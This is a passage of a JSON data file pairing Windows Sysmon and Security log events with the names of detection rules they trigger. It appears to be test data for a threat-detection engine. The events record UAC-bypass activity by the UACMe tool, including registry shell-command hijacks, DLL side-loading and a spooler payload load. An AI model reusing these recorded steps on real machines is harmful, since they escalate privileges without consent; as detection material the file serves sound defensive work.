utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 
11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 
11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution_attributes":{"ProcessID":7212,"ThreadID":5064},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c 
notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 
02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution_attributes":{"ProcessID":748,"ThreadID":6064},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 
(WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 
10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 
08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse 
Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 
10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
